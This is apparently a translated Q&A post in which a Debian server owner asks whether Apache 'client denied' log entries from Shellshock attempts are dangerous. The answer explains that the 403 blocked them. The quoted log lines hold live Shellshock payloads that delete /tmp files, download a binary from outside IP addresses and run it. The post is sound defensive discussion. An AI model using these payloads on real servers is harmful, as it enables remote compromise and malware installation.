Eu tenho um servidor com o debian 7. Eu estava verificando o arquivo de log de erros do Apache e vi algumas linhas como esta
[Fri Mar 20 04:56:48 2015] [error] [client 222.66.95.253] client denied by server configuration: /home/username/www/, referer: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-bbce >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-bbce >> /tmp/Run.sh;echo /tmp/China.Z-bbce >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"
[Mon Mar 16 16:58:15 2015] [error] [client 210.35.74.116] client denied by server configuration: /home/username/www/, referer: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.180.31.43:9574/xudpASD -O /tmp/China.Z-wwyy\xb0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wwyy\xb0 >> /tmp/Run.sh;echo /tmp/China.Z-wwyy\xb0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"
Eu posso estar enganado, mas por causa dessa parte () { :; }; eu acho que alguém estava tentando usar o shellshock bug.
Mas independentemente de ser ou não shellshock, a questão é - se eu tiver linhas em logs com mensagem
client denied by server configuration
é este smth que eu deveria me preocupar, ou porque o pedido foi recusado eu posso ignorá-lo - ter certeza de que nenhum script malicioso foi baixado / executado?
"Cliente negado pela configuração do servidor" significa que a solicitação foi bloqueada por uma diretiva Require (ou em versões mais antigas do Apache, as diretivas Permitir / Negar ), por um regra de reescrita , ou por algum outro módulo do Apache. Em particular, significa que a solicitação nunca foi passada para um manipulador externo, portanto, a exploração não poderia ter uma chance de ser executada. O cliente foi imediatamente atendido a um erro 403 Proibido.
Tags linux apache-2.2